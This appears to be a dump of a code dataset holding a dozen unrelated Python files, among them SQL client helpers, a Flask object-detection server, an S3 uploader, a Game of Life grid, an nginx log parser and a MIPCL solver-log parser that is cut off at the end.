def add_cliente(parametros):
    """Insert a new client row; parametros fills the non-NULL placeholders."""
    insert_sql = 'INSERT INTO clientes VALUES(%s,%s,%s,%s,%s,%s,%s,%s,NULL,NULL,%s,NULL,%s)'
    get_connection(insert_sql, parametros)
    print("Datos almacenados")
    # Refresh the listing after the insert.
    get_clientes()
def edit_cliente(_id, parametros):
    """Update the client row identified by documento == _id.

    Fixes: the SET list was missing "= %s" after ciudad_circulacion (an SQL
    syntax error at execution time), and _id was interpolated into the SQL
    (injection risk) — it is now bound as the final query parameter.
    """
    query = ('UPDATE clientes SET nombre = %s, documento = %s, t_documento = %s, '
             'telefono = %s, direccion = %s, correo = %s, ciudad_circulacion = %s '
             'WHERE documento = %s')
    get_connection(query, tuple(parametros) + (_id,))
    print("Datos almacenados")
    # Refresh the listing after the update.
    get_clientes()
def delete_cliente(_id):
    """Delete the client row identified by documento == _id.

    Fixes: the original query was a plain string (no f-prefix), so the WHERE
    clause contained the literal text "{_id}" and never matched a row. The
    id is now bound as a query parameter.
    """
    query = 'DELETE FROM clientes WHERE documento = %s'
    get_connection(query, (_id,))
'''
def delete_cliente():
#mensaje['text'] = ''
#try:
#.tabla.item(.tabla.selection())['text'][0]
#except IndexError as e:
# mensaje['text'] = 'Selecciona un producto'
return
#mensaje['text'] = ''
nombre = .tabla.item(.tabla.selection())['text']
query = 'DELETE FROM clientes WHERE nombre = %s'
.get_connection(query, (nombre,))
.mensaje['text'] = 'Cliente {} fue borrado correctamente'.format(nombre)
.get_clientes()
def edit_cliente():
.mensaje['text'] = ''
try:
.tabla.item(.tabla.selection())['text'][0]
except IndexError as e:
.mensaje['text'] = 'Selecciona un producto'
return
nombre = .tabla.item(.tabla.selection())['text']
documento = .tabla.item(.tabla.selection())['values'][0]
.ventana_edit = Toplevel()
.ventana_edit.title = 'Editar cliente'
''' |
8,174 | a18e98db417fe234e3d8d5d1321203fbac18751c | #coding: utf-8
from flask import Flask, redirect, url_for, request
from werkzeug.utils import secure_filename
import torch, torchvision
# Setup detectron2 logger
import detectron2
from detectron2.utils.logger import setup_logger
setup_logger()
# import some common libraries
import numpy as np
import os, json, cv2, random
# import some common detectron2 utilities
from detectron2 import model_zoo
from detectron2.engine import DefaultPredictor
from detectron2.config import get_cfg
from detectron2.utils.visualizer import Visualizer
from detectron2.data import MetadataCatalog, DatasetCatalog
from detectron2.structures import Instances
import os
import sys
app = Flask(__name__)
def init_setup():
    """Build and return the detectron2 config used by the predictor."""
    config = get_cfg()
    # add project-specific config (e.g., TensorMask) here if you're not running a model in detectron2's core library
    model_yaml = "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml"
    config.merge_from_file(model_zoo.get_config_file(model_yaml))
    config.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5  # detection score threshold
    # Pretrained weights for the same model from detectron2's model zoo.
    config.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(model_yaml)
    config.MODEL.DEVICE = 'cpu'  # run inference on CPU
    return config
def allowed_file(filename):
    """Return True if filename has an extension listed in ALLOWED_EXTENSIONS.

    The comparison is now case-insensitive: the config stores lowercase
    extensions, so the original rejected uploads like "photo.JPG".
    """
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']
def detect_object(filename):
    """Run Mask R-CNN on an uploaded image and count configured classes.

    :param filename: name of an image already saved under UPLOAD_FOLDER.
    :return: Flask JSON response {'result': [{'t_class', 't_count'}, ...]}.
    """
    PATH_TO_TEST_IMAGES_DIR = app.config['UPLOAD_FOLDER']
    TEST_IMAGE_PATH = os.path.join(PATH_TO_TEST_IMAGES_DIR, filename)
    PRED_IMAGE_PATH = os.path.join(PATH_TO_TEST_IMAGES_DIR, 'pred_' + filename)
    im = cv2.imread(TEST_IMAGE_PATH)
    cfg = app.config['detectron2_cfg']
    # NOTE(review): building a DefaultPredictor per request reloads the model
    # weights each time — consider caching it if latency matters.
    predictor = DefaultPredictor(cfg)
    outputs = predictor(im)
    # Keep only the classes configured in THING_CLASSES (e.g. banana, orange).
    data_set = MetadataCatalog.get(cfg.DATASETS.TRAIN[0])
    # print(data_set.thing_classes)
    pred_inst = outputs["instances"].to("cpu")
    show_inst = []
    pred_res = []
    for tc in app.config['THING_CLASSES']:
        if tc not in data_set.thing_classes:
            print("Thing Class:"+ tc +", Not found in the training set")
            continue
        t_idx = data_set.thing_classes.index(tc)
        # Select the detections whose predicted class matches this label.
        filt_inst = pred_inst[pred_inst.pred_classes == t_idx]
        cat_cnt = len(filt_inst)
        if cat_cnt > 0:
            show_inst.append(filt_inst)
            pred_res.append({"t_class": tc, "t_count":cat_cnt})
    if len(show_inst) > 0:
        pred_inst = Instances.cat(show_inst)
    # Visualization is disabled; re-enable to write an annotated image.
    # v = Visualizer(im[:, :, ::-1],data_set , scale=0.3)
    # out = v.draw_instance_predictions(pred_inst)
    # cv2.imwrite(PRED_IMAGE_PATH, out.get_image()[:, :, ::-1])
    response = app.response_class(
        response=json.dumps({'result': pred_res}),
        status=200,
        mimetype='application/json'
    )
    return response
@app.route("/infer", methods=['POST'])
def infer():
    """Accept an uploaded image (form field 'fimg') and return detections.

    Fixes: the original returned None (an HTTP 500 in Flask) when the field
    was missing or the extension disallowed, and raised KeyError when 'fimg'
    was absent; both cases now get an explicit 400 response.
    """
    file = request.files.get('fimg')
    if file and allowed_file(file.filename):
        filename = secure_filename(file.filename)
        file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
        return detect_object(filename=filename)
    return 'invalid or missing file', 400
if __name__ == '__main__':
    # Configure upload handling and the model once, then serve on all
    # interfaces (container entry point).
    app.config['UPLOAD_FOLDER'] = '/app/imgstore/'
    app.config['ALLOWED_EXTENSIONS'] = set(['png', 'jpg', 'jpeg'])
    app.config['detectron2_cfg'] = init_setup()  # loads model config/weights URL
    app.config['THING_CLASSES'] = ['banana', 'orange', 'carrot', 'apple', 'bottle']
    app.run(debug=False,host='0.0.0.0')
|
8,175 | 1cab38721e6b96a9877bd67cbddaa4d6b4e53d1b | '''
Factory for creating and running ssimulations against optimization tools
Author:
Matthew Barber <mfmbarber@gmail.com>
'''
from .strategy_annealer import StrategyAnnealer
from .strategy_deap import StrategyDeap
class CalulateStrategyWith:
    """Static entry points for running a strategy simulation against an
    optimization back-end (simulated annealing or genetic evolution)."""

    @staticmethod
    def Annealing(car, include_initial_tyre=False, iterations=100000):
        '''
        Use simulated annealing to determine the best strategy

        Args:
            car (Car): An initial car to test with
            include_initial_tyre (bool): Include the initial tyre in moves
            iterations (int): Iteration limit

        Returns:
            Car
        '''
        annealer = StrategyAnnealer(car)
        annealer.setIncludeInitialTyreInMove(include_initial_tyre)
        annealer.steps = iterations
        best_state, _energy = annealer.anneal()
        return best_state

    @staticmethod
    def geneticAlgorithm(car, include_initial_tyre=False, generations=1000):
        '''
        Use genetic evolution to determine the best strategy

        Args:
            car (Car): An initial car to test with
            include_initial_tyre (bool): Include the initial tyre in moves
            generations (int): Evolution generation limit

        Returns:
            Car
        '''
        simulation = StrategyDeap(car, include_initial_tyre, generations)
        return simulation.run()
|
8,176 | 2f0d611fecdb5717029938d2ec2cd2db345b8f3a | import boto3
import json
from botocore.exceptions import ClientError
# upload_to_s3("abc.png", 1)
def upload_to_s3(file_name, node_number):
    """Upload file_name into the 'capstone12' bucket under <node_number>/.

    Credentials are read from awsinfo.json in the working directory.
    Exits the process (original behavior) if that file is missing.

    Fixes: the credentials file handle was opened without ever being closed;
    it is now managed with a `with` block.
    """
    try:
        with open("awsinfo.json") as key_file:
            data = json.load(key_file)
    except FileNotFoundError:
        print("awsinfo.json is not exist in dir.")
        exit(-1)
    s3 = boto3.client(
        's3',
        aws_access_key_id = data['accessKeyId'],
        aws_secret_access_key = data['secretAccessKey']
    )
    with open(file_name, "rb") as f:
        # NOTE(review): 'public-read-write' makes the object world-writable —
        # confirm this ACL is really intended.
        s3.upload_fileobj(f,"capstone12", str(node_number)+"/"+file_name,
            ExtraArgs={'ACL' : 'public-read-write'}
        )
    print("File Upload Complete to " + str(node_number) + "/" + file_name)
8,177 | 80d5cc9871ec753fb9239df7680ac62809baa496 | from cell import Cell
from tkinter import messagebox
import time
import fileTools
class Playground:
    """
    The playground for the program. All cells are stored here. This object also import/export cells to the playground
    :param screen: The screen object.
    :param mouse: The mouse object.
    :param keyboard: The keyboard object.
    :param root: The root object.
    Attributes:
        cells: All the cells that is on the playground.
        clickSwitch: The size of the one grid box in pixels.
    """
    def __init__(self, root, screen, mouse, keyboard):
        self.root = root
        self.screen = screen
        self.mouse = mouse
        self.keyboard = keyboard
        self.cells = []                  # all living (and temporarily dead) Cell objects
        self.clickSwitch = False         # debounce flag for mouse clicks
        self.autoGenerateMode = False    # when True, advance a generation every update
        self.generation = 0
        self.timeToCalcGeneration = 0    # duration of the last nextGeneration() call
        self.bindKeyboardKeysToFunctions()

    def bindKeyboardKeysToFunctions(self):
        """
        Binds diffrent functions to keyboard presses.
        :return: (nothing)
        """
        self.keyboard.bindFunctionToKey("space", self.nextGeneration)

    def updatePlayground(self):
        """
        Updates the playground. Checking for user input to interact with the playground.
        :return: (nothing)
        """
        self.getMouseInput()
        if(self.autoGenerateMode):
            self.nextGeneration()

    def getMouseInput(self):
        """
        This method is getting the mouse and doing diffrent thing with it. For example: spawning a new cell if the user click on an grid-box.
        :return: (nothing)
        """
        xPos = self.mouse.xGridPos
        yPos = self.mouse.yGridPos
        #Changing the hoverblock color depending if the mouse is hovering over an living cell or not.
        if(self.getCellFromPosition(xPos, yPos)):
            self.screen.canvas.itemconfig(self.screen.hoverBlock, fill='#ff0000')
        else:
            self.screen.canvas.itemconfig(self.screen.hoverBlock, fill='#00ff00')
        #Placing an cell on the playground if the user is clicking on the playground
        if(self.mouse.leftButton and self.clickSwitch == False):
            if(self.keyboard.shiftKey):
                clickedCell = self.getCellFromPosition(xPos, yPos)
                # Shift-click toggles: create where empty, delete where occupied.
                if(clickedCell == False):
                    self.createCell(xPos, yPos)
                else:
                    self.deleteCell(clickedCell)
            self.clickSwitch = True
        if (self.mouse.leftButton == False and self.clickSwitch == True):
            self.clickSwitch = False

    def deleteCell(self, cell):
        """
        Deleting a cell from the cell-list.
        :param cell: The cell that is going to be delete.
        :return: (nothing)
        """
        index = self.cells.index(cell)
        self.cells[index].delete()
        self.cells.remove(cell)

    def createCell(self, xPos, yPos):
        """
        Creates a new cell for a given position.
        :param xPos: The x-position on the grid.
        :param yPos: the y-position on the grid
        :return: (nothing)
        """
        self.cells.append(Cell(self.screen, xPos, yPos))

    def getCellFromPosition(self, xPos, yPos):
        """
        Gets a cell from a given position.
        :param xPos: The x-position on the grid.
        :param yPos: the y-position on the grid
        :return: Cell
        """
        # NOTE(review): linear scan — makes setNeighbors() O(n^2) overall.
        for cell in self.cells:
            if(xPos == cell.x and yPos == cell.y):
                return cell
        return False

    def clearPlayground(self):
        """
        Removes all the cells from the playground
        :return: (nothing)
        """
        for cell in self.cells:
            cell.delete()
        self.cells = []
        self.generation = 0

    def importPlayground(self, filepath):
        """
        This function is importing a playground.
        :param filepath: The filepath to import the playground to.
        :return: (nothing)
        """
        cellOutOfBound = False
        avgXPos = 0
        avgYPos = 0
        # NOTE(review): file handle is never closed and an empty file makes
        # len(cellPositions) zero, dividing by zero below — confirm inputs.
        fileWrite = open(filepath, "r")
        cellPositions = fileWrite.readlines()
        self.clearPlayground()
        for cellPos in cellPositions:
            #Cleans the string
            cleanCellPos = fileTools.cleanString(cellPos)
            if(cleanCellPos == ""):
                continue
            #Check the format.
            cleanCellPos = self.checkFileFormat(cleanCellPos)
            if(cleanCellPos):
                cellXPos, cellYPos = cleanCellPos
            else:
                return
            #Checks if the coords is outside the world.
            if(cellXPos > self.screen.worldSize or cellYPos > self.screen.worldSize or cellXPos < 0 or cellYPos < 0):
                cellOutOfBound = True
            else:
                newCell = Cell(self.screen, cellXPos, cellYPos)
                rectCellPos = self.screen.canvas.coords(newCell.rect)
                avgXPos += rectCellPos[0]; avgYPos += rectCellPos[1]
                self.cells.append(newCell)
        #Print warning that some cells are not renderd.
        if(cellOutOfBound):
            messagebox.showwarning("Warning!", "Some cells are placed outside of the playground!")
        #Moving the user to where the cells are.
        avgXPos /= len(cellPositions); avgYPos /= len(cellPositions)
        self.screen.offsetX += avgXPos - self.screen.width/2
        self.screen.offsetY += avgYPos - self.screen.height/2

    def exportPlayground(self, filepath):
        """
        This function is exporting a playground.
        :param filepath: The filepath to export the playground to.
        :return: (nothing)
        """
        cellPositions = ""
        for cell in self.cells:
            if(cell.dead == False):
                cellPositions += str(cell.x) + " " + str(cell.y) + "\n"
        fileWrite = open(filepath, "w")
        fileWrite.write(cellPositions)
        fileWrite.close()

    def checkFileFormat(self, cellPos):
        """
        Checks if the file has the right format for this program.
        :param fileContent: The content of the file
        :return: The positions in a tuple, (x, y), false if there is an error.
        """
        try:
            cellPosList = cellPos.split()
            cellXPos = int(cellPosList[0])
            cellYPos = int(cellPosList[1])
        except ValueError:
            messagebox.showerror("Error: Wrong format", "The choosen file do not have the correct format. Be so kind to choose an other file.")
            return False
            pass
        return (cellXPos, cellYPos)

    def removeCells(self, cellArray):
        """
        Deletes all the cells from the array and playground.
        :param cellArray: The array of cells to delete.
        :return: (nothing)
        """
        for cell in cellArray:
            cell.delete()
            self.cells.remove(cell)

    def setNeighbors(self):
        """
        Creates dead cells around all living cells and calculating all the neighbors for the dead and the living cells
        :return: (nothing)
        """
        for cellIndex in range(len(self.cells)):
            cell = self.cells[cellIndex]
            #Checks the 8 cells around the living one.
            for neighborsX in range(cell.x - 1, cell.x + 2):
                for neighborsY in range(cell.y - 1, cell.y + 2):
                    #If the position is outside the world, loop around.
                    neighborsX = neighborsX % self.screen.worldSize
                    neighborsY = neighborsY % self.screen.worldSize
                    #Skipping itself. Becouse we do not want to calculate itself as a neighbor
                    if(neighborsX == cell.x and neighborsY == cell.y):
                        continue
                    else:
                        #Checks if a cell exist at neighborsX, neighborsY
                        cellToCheck = self.getCellFromPosition(neighborsX, neighborsY)
                        if(cellToCheck != False):
                            #Add one to the neighbor var if there already exist and cell for the given position.
                            cellToCheck.numOfNeighbor += 1
                        else:
                            #Creates a new cell if it do not exist any.
                            newCell = Cell(self.screen, neighborsX, neighborsY, True)
                            newCell.numOfNeighbor += 1
                            self.cells.append(newCell)

    def checkAmountOfNeighbors(self):
        """
        Check the amount of neighbors and kills or creates new cell depending on the amount.
        :return: (nothing)
        """
        cellsToDelete = []
        for cell in self.cells:
            # Conway's rules: die on <2 or >3 neighbors; a dead cell with
            # exactly 3 neighbors becomes alive.
            if(cell.numOfNeighbor > 3 or cell.numOfNeighbor < 2 or (cell.numOfNeighbor == 2 and cell.dead == True)):
                cellsToDelete.append(cell)
            elif(cell.numOfNeighbor == 3 and cell.dead == True):
                cell.makeAlive()
            cell.numOfNeighbor = 0
        self.removeCells(cellsToDelete)

    def nextGeneration(self):
        """
        This method is updating the cells to the next generation.
        :return: (nothing)
        Thanks to Martins for the idea to have modolu of the current posotion.
        """
        # Start a timer to calculate the time the render one generation.
        # (Timer resolution: ticks of 1/100000 s, i.e. 10 microseconds.)
        startTime = int(round(time.time() * 100000))
        self.generation += 1
        self.setNeighbors()
        self.checkAmountOfNeighbors()
        # Ends a timer to calculate the time the render one generation.
        endTime = int(round(time.time() * 100000))
        self.timeToCalcGeneration = (endTime - startTime)
|
8,178 | 0eab23f4271f724da587707599eb0cbf2144efa1 | # zip(),可以压缩 N 个列表成为一个zip对象(可迭代对象)。
# zip() pairs up N iterables into one zip object (an iterable of tuples).
a =['a', 'b', 'c']
b =[1, 2, 3]
[x for x in zip(a, b)] # [('a', 1), ('b', 2), ('c', 3)]
# With inputs of unequal length, zip stops at the shortest one.
c =['x','y']
[x for x in zip(a, c)] # [('a', 'x'), ('b', 'y')]
# Example: iterate two parallel lists together.
books =['简爱','小王子','瓦尔登湖']
prices =[56, 78, 66]
for book, price in zip(books, prices):
    print("%s的价格是:%3.1f"% (book, price))
# reversed() iterates any sequence back to front.
[y for y in reversed(b)] # [3, 2, 1]
# sorted() takes any iterable and returns a new ascending list; it accepts
# reverse=True and key=<callable> (the sort key) as keyword arguments.
for book in sorted(books, reverse=True, key=len):
    print(book)
8,179 | 01467a4dad3255a99025c347469881a71ffbae7c | import os
from google.cloud import bigquery
def csv_loader(data, context):
    """Cloud Function entry point: load a CSV uploaded to GCS into BigQuery.

    :param data: GCS event payload; data['name'] is the uploaded object path.
    :param context: Cloud Functions event context (unused).
    Environment variables DATASET, TABLE, BUCKET and VERSION must be set.
    Blocks until the load job finishes.
    """
    client = bigquery.Client()
    dataset_id = os.environ['DATASET']
    dataset_ref = client.dataset(dataset_id)
    job_config = bigquery.LoadJobConfig()
    # Fixed schema: the CSV columns must arrive in exactly this order.
    job_config.schema = [
        bigquery.SchemaField('id', 'INTEGER'),
        bigquery.SchemaField('first_name', 'STRING'),
        bigquery.SchemaField('last_name', 'STRING'),
        bigquery.SchemaField('email', 'STRING'),
        bigquery.SchemaField('gender', 'STRING'),
        bigquery.SchemaField('ip_address', 'STRING')
    ]
    job_config.skip_leading_rows = 1  # skip the CSV header row
    job_config.source_format = bigquery.SourceFormat.CSV
    # get the URI for uploaded CSV in GCS from 'data'
    uri = 'gs://' + os.environ['BUCKET'] + '/' + data['name']
    # Kick off the server-side load job.
    load_job = client.load_table_from_uri(
        uri,
        dataset_ref.table(os.environ['TABLE']),
        job_config=job_config)
    print('Starting job {}'.format(load_job.job_id))
    print('Function=csv_loader, Version=' + os.environ['VERSION'])
    print('File: {}'.format(data['name']))
    load_job.result()  # wait for table load to complete.
    print('Job finished.')
    destination_table = client.get_table(dataset_ref.table(os.environ['TABLE']))
    print('Loaded {} rows.'.format(destination_table.num_rows))
8,180 | 14023785983f493af57189b3d96254efef2e33ae | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2016-03-15 16:39:32
# @Author : Your Name (you@example.org)
# @Link : http://example.org
# @Version : $Id$
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from widgets.favorits.favorit_win import Ui_DialogFavorit
import json
import re
from widgets.input_link import def_url
#from favorit_win import Ui_DialogFavorit
class Favorits(QDialog, Ui_DialogFavorit):
    """Dialog for managing a list of favorite stream URLs persisted in
    setting.json under the 'favorit' key."""
    def __init__(self):
        super(Favorits, self).__init__()
        self.setupUi(self)
        # Localized (Russian) button captions: Save / Cancel.
        self.buttonBox.button(QDialogButtonBox.Save).setText("Сохранить")
        self.buttonBox.button(QDialogButtonBox.Cancel).setText("Отмена")
        self.path = 'setting.json'  # settings file holding the favorites list
        self.setStyleSheet(open('static/style.qss').read())
        self.list_fav()
        self.plus_pb.setIcon(QIcon(":/icons/icons/plus.png"))
        self.minus_pb.setIcon(QIcon(":/icons/icons/minus.png"))
        self.plus_pb.clicked.connect(self.addfav)
        self.minus_pb.clicked.connect(self.delfav)

    def list_fav(self):
        """Load settings from disk and populate the favorites list widget."""
        try:
            self.data = json.load(open(self.path))
            for i in self.data['favorit']:
                self.favlist_listWidget.addItem(i)
        except FileNotFoundError:
            print("File with setting not found")
        except KeyError:
            # First run: create the 'favorit' key, persist it, then retry.
            self.data['favorit'] = []
            json.dump(self.data, open(self.path, 'w'))
            self.list_fav()

    def addfav(self):
        """Prompt for a URL and append it to favorites if it is http(s)."""
        name = def_url.Input_stream()
        if name.exec_():
            link = name.url_stream_le.text()
            reg = "http[s]?://"
            if re.match(reg, link) is not None:
                self.data['favorit'].append(link)
                json.dump(self.data, open(self.path, 'w'))
                # Rebuild the widget so it reflects the saved list.
                self.favlist_listWidget.clear()
                self.list_fav()

    def delfav(self):
        """Remove the currently selected favorite and refresh the widget."""
        buf = self.favlist_listWidget.currentItem().text()
        self.data['favorit'].remove(buf)
        json.dump(self.data, open(self.path, 'w'))
        self.favlist_listWidget.clear()
        self.list_fav()
if __name__ == '__main__':
    # Manual test: show the dialog standalone.
    app = QApplication([])
    w = Favorits()
    w.show()
    app.exec_()
|
8,181 | b4a267873c5823ecfa62a5e90b67c37f9cca3cd2 | /Users/apple/anaconda/lib/python3.5/operator.py |
8,182 | e9e119dd69f9416e007e748d7f494741140efc8e | import sys
filepath = 'input.txt'
def intersection(list1, list2):
    """Return the set of elements that appear in both iterables."""
    common = set(list1)
    return common.intersection(list2)
def computeSteps(x, y, step, steps):
    """Accumulate the combined step count for grid point (x, y) in `steps`.

    If the point has been recorded before, the new step count is added to
    the existing total; otherwise the entry is created.
    """
    steps[(x, y)] = steps.get((x, y), 0) + step
def buildPoints(wire, steps):
    """Trace a wire description (e.g. ['R8', 'U5']) from the origin.

    Returns the list of every grid point visited (origin excluded, in visit
    order) and records, via computeSteps, the number of steps taken to reach
    each point in the shared `steps` dict.

    Improvement: the four near-identical direction branches are collapsed
    into a single loop driven by a delta table. Unknown direction letters
    are skipped, matching the original's behavior.
    """
    deltas = {'U': (0, 1), 'D': (0, -1), 'L': (-1, 0), 'R': (1, 0)}
    points = []
    x, y = 0, 0
    s = 0  # total steps walked along this wire so far
    for p in wire:
        direction = p[0]
        distance = int(p[1:])
        if direction not in deltas:
            continue  # original fell through silently for unknown directions
        dx, dy = deltas[direction]
        for _ in range(distance):
            x += dx
            y += dy
            points.append((x, y))
            s += 1
            computeSteps(x, y, s, steps)
    return points
# Driver: read two wire descriptions from input.txt and report the
# intersection reached with the fewest combined steps (AoC 2019 day 3 style).
with open(filepath) as fp:
    steps = {}
    port = (0,0)  # NOTE(review): unused — the origin is implicit in buildPoints
    wire1 = fp.readline().strip().split(',')
    wire2 = fp.readline().strip().split(',')
    point1 = buildPoints(wire1, steps)
    point2 = buildPoints(wire2, steps)
    commonPoints = intersection(point1, point2)
    # NOTE(review): `min` shadows the builtin min() for the rest of the script.
    min = sys.maxsize
    for k in commonPoints:
        val = steps.get(k)
        if val < min:
            min = val
    print(min)
|
8,183 | f870c776a62f3b743356c5515cd25e588dbfca15 | import time
from typing import List
from classiclikeiguana.timeout import timeout
class ExecutionMetrics:
    """Outcome of one monitored execution: timing, success flag, line count
    and any error lines collected from the output."""

    def __init__(self, duration, succeeded: bool, timed_out: bool, lines: int, error: List[str] = None):
        self.duration = duration
        self.succeeded: bool = succeeded
        self.timed_out: bool = timed_out
        self.lines: int = lines
        # Normalize the None default to a fresh list (avoids sharing a
        # mutable default between instances).
        self.error: List[str] = list() if error is None else error

    def __str__(self):
        return "succeeded: {succeeded} ; lines: {lines} ; duration: {duration} s ; error: {error}" \
            .format(succeeded=self.succeeded, lines=self.lines, duration=self.duration, error=self.error)
def read_stdout_until(process, terminal_startswith: str, failure_startswith: List[str], timeout_time: float,
                      debug: bool = False):
    """Consume process stdout until a terminal line appears or time runs out.

    Lines starting with any failure prefix are collected as errors and mark
    the run as failed; a line starting with any terminal prefix stops the
    read and fixes the duration. Returns an ExecutionMetrics summary.
    NOTE(review): terminal_startswith is annotated as str but is iterated as
    a collection of prefixes — the annotation looks wrong; confirm callers.
    """
    start = time.time()
    line: str = ""
    lines: int = 0
    duration = None
    succeeded = True
    timed_out = False
    errors: List[str] = list()
    with timeout(timeout_time):
        while True:
            line = process.stdout.readline()
            if debug: print(line, end="")
            for start_str in failure_startswith:
                if line.startswith(start_str):
                    errors.append(line)
                    succeeded = False
            if any(line.startswith(start_str) for start_str in terminal_startswith):
                duration = time.time() - start
                break
            else:
                lines += 1
    if duration is None:
        # The timeout context aborted the loop before a terminal line arrived.
        succeeded = False
        timed_out = True
        duration = timeout_time
    return ExecutionMetrics(duration, succeeded, timed_out, lines, errors)
|
8,184 | e2e275c48f28843931412f8e620f1be90289b40c | ### we prepend t_ to tablenames and f_ to fieldnames for disambiguity
import uuid
crud.settings.formstyle="table2cols"
########################################
db.define_table('t_form',
Field('id','id',
represent=lambda id:SPAN(id,' ',A('view',_href=URL('form_read',args=id)))),
Field('f_name', type='string',
label=T('Name')),
Field('f_content', type='text',
represent=lambda x: MARKMIN(x),
comment='WIKI (markmin)',
label=T('Content')),
Field('f_public', type='boolean', default=False,
label=T('Available to all users?')),
Field('f_uuid',default=str(uuid.uuid4()),
writable=False,readable=False),
Field('f_created_on','datetime',default=request.now,
label=T('Created On'),writable=False,readable=False),
Field('f_modified_on','datetime',default=request.now,
label=T('Modified On'),writable=False,readable=False,
update=request.now),
Field('f_created_by',db.auth_user,default=auth.user_id,
label=T('Created By'),writable=False,readable=False),
Field('f_modified_by',db.auth_user,default=auth.user_id,
label=T('Modified By'),writable=False,readable=False,
update=auth.user_id),
format='%(f_name)s',
migrate=settings.migrate)
db.t_form.f_name.default="Example: Job Application"
db.t_form.f_content.default="""
# Job Application
## Instuructions
- please complete the form
- export it in PDF
- print it
- sign it
- fax it to 111-111-1111
## Job Application Questionaire
### Personal data
--------
**first name:** | ``first_name``:input_text
**last name:** | ``last_name``:input_text
**email:** | ``email``:input_text
--------
### Skills
``skills``:input_area
### Signature
``accept``:input_bool Accept [[Confidentiality Agreement http://example.com]]
Signature: ..................................... Date: ``today``:input_date
"""
|
8,185 | a299bd230a25a646060f85cffc8e84c534e2f805 | # -*- coding: utf-8 -*-
# Copyright (c) 2017 Feng Shuo
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
from itertools import islice
from config import RequestInfo
import re
__all__ = ['NginxRequestInfo', ]
class NginxLogParse(object):
    """
    Parse Nginx access.log lines into RequestInfo tuples.
    """
    # Fix: the original __slots__ also listed 'ngx_log', which conflicts with
    # the 'ngx_log' property defined below and made class creation fail with
    # ValueError("'ngx_log' in __slots__ conflicts with class variable").
    __slots__ = ('_ngx_log',)

    def __init__(self):
        self._ngx_log = '/var/log/nginx/access.log'

    @property
    def ngx_log(self):
        """
        ngx_log filename
        :returns: ngx_log filename
        :rtype: ``string``
        """
        return self._ngx_log

    @ngx_log.setter
    def ngx_log(self, nginx_log):
        """
        set ngx_log
        """
        self._ngx_log = nginx_log

    def get_ngx_logs(self, line_nums=-1000):
        """
        Get nginx logs by line_nums
        :param line_nums:
            line/row number in nginx log
        :type line_nums:
            ``integer``
        :returns:
            if line_nums > 0, then get single request message line
            if line_nums = 0, get all request messages lines
            if line_nums < 0, get latest ${line_nums} request messages lines
        :rtype:
            ``list``
        """
        try:
            with open(self.ngx_log) as F:
                if line_nums > 0:
                    for line in islice(F, line_nums-1, line_nums):
                        return [line]
                else:
                    lines = F.readlines()[line_nums:]
                    return lines
        except Exception as e:
            # Fix: the original used the Python-2-only print statement; the
            # single-argument call form is valid on both Python 2 and 3.
            print("Failed to get detail log(s) in nginx access.log due to %s" % e)

    @staticmethod
    def ngx_log_to_requestinfo(log=None):
        """
        Parse nginx request log(one row/line) into namedtuple instance ``Request_info`` defined in class
        :param log:
            one nginx request log log in access.log you extracted
        :type log:
            string
        """
        # pat is defined due to default nginx access.log format.
        # NOTE(review): the dots in the IP part are unescaped, so they match
        # any character — harmless for well-formed logs but worth confirming.
        pat = (r''
               '(\d+.\d+.\d+.\d+)\s-\s-\s'
               '\[(.+)\]\s'
               '"GET\s(.+)\s\w+/.+"\s'
               '(\d+)\s'
               '(\d+)\s'
               '"(.+)"\s'
               '"(.+)"'
               )
        if log:
            request_info = re.findall(pat, log)[0]
            if request_info:
                request_info = RequestInfo(request_info[0], request_info[1], request_info[2], request_info[3],
                                           request_info[4], request_info[5], request_info[6])
            return request_info
# TODO should move to test
# ngx_request_info = NginxLogParse()
# ngx_request_info.ngx_log = '../test.log'
# line = ngx_request_info.get_ngx_logs(100)
# req_info = ngx_request_info.ngx_log_to_requestinfo(line[0])
|
8,186 | ee68ebe146f948f3497577f40741e59b7421e652 | """
Deprecated entry point for a component that has been moved.
"""
# currently excluded from documentation - see docs/README.md
from ldclient.impl.integrations.files.file_data_source import _FileDataSource
from ldclient.interfaces import UpdateProcessor
class FileDataSource(UpdateProcessor):
    @classmethod
    def factory(cls, **kwargs):
        """Provides a way to use local files as a source of feature flag state.

        .. deprecated:: 6.8.0
          This module and this implementation class are deprecated and may be changed or removed in the future.
          Please use :func:`ldclient.integrations.Files.new_data_source()`.

        The keyword arguments are the same as the arguments to :func:`ldclient.integrations.Files.new_data_source()`.
        """
        def make_data_source(config, store, ready):
            # Forward the factory's keyword arguments to the real
            # implementation, applying the documented defaults.
            return _FileDataSource(store, ready,
                                   paths=kwargs.get("paths"),
                                   auto_update=kwargs.get("auto_update", False),
                                   poll_interval=kwargs.get("poll_interval", 1),
                                   force_polling=kwargs.get("force_polling", False))
        return make_data_source
|
8,187 | 191154c896fe441519ad4f343c6d92d6304fb3db | """
Created on Apr 27, 2017
@author: Franziska Schlösser
"""
from ipet.parsing.Solver import Solver
import re
from ipet import Key
from ipet import misc
class MIPCLSolver(Solver):
    """IPET Solver adapter that parses MIPCL solver log output."""
    solverId = "MIPCL"

    # Regexes used to recognize a MIPCL log and extract scalar values.
    recognition_expr = re.compile("Reading data")
    primalbound_expr = re.compile("Objective value: (\S*)")
    dualbound_expr = re.compile("^(?:\s*lower-bound: |Objective value: )(\S+)")
    solvingtime_expr = re.compile("Solution time: (\S*)")
    version_expr = re.compile("MIPCL version (\S*)")

    # Maps terminal log lines to IPET solver status codes.
    solverstatusmap = {"Objective value: (\S*) - optimality proven" : Key.SolverStatusCodes.Optimal,
                       "This problem is infeasible" : Key.SolverStatusCodes.Infeasible,
                       "Time limit reached" : Key.SolverStatusCodes.TimeLimit}

    # variables needed for primal bound history
    inTable = False  # parser state: currently inside the bound table
    primalboundhistory_exp = re.compile("^ Time Nodes Leaves Sols Best Solution Lower Bound Gap%")
    endtable = re.compile('^===========================================')

    def __init__(self, **kw):
